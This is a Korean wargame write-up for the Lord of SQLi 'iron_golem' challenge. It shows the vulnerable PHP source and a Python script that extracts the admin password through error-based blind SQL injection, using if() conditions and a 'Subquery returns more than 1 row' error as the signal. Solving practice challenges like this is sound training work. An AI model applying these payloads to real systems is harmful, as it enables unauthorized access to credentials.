sangjun

문제소스

query : select id from prob_iron_golem where id='admin' and pw=''

<?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit(mysqli_error($db));
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");
  highlight_file(__FILE__);
?>

문제 분석 및 페이로드

1. Error based sqli

-> mysql if문 사용법 : if( 조건절, 참일때, 거짓일때)

-> (select * union select *)할때 union을 이용할 때는 괄호 무조건 붙여주기

#참이면 Hello admin을 출력한다.
import requests
import string
from pwn import *
URL="https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kogf8srvhks2phbp9kdndnk5ar"}
passwd=""
print(brute)
length=-1
#find passwd Length
for i in range(100):
    query=f"""?pw=' or if(length(pw)={i},(select 1 union select 2),1)%23"""  #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
    response=requests.get(URL+query,cookies=cookies)
    if "Subquery returns more than 1 row" in response.text:
        length=i
        break

print(f"pass length is {length}")
#find passwd
for i in range(1,length+1):
    for ch in brute:
        query=f"""?pw=' or if(ord(mid(pw,{i},1))={ord(ch)},(select 1 union select 2),1)%23"""
        response=requests.get(URL+query,cookies=cookies)
        print(query)
        if "Subquery returns more than 1 row" in response.text:
            passwd+=ch
            log.critical(f"{ch}")
            #pause()

            break

print(f"passwd is {passwd}")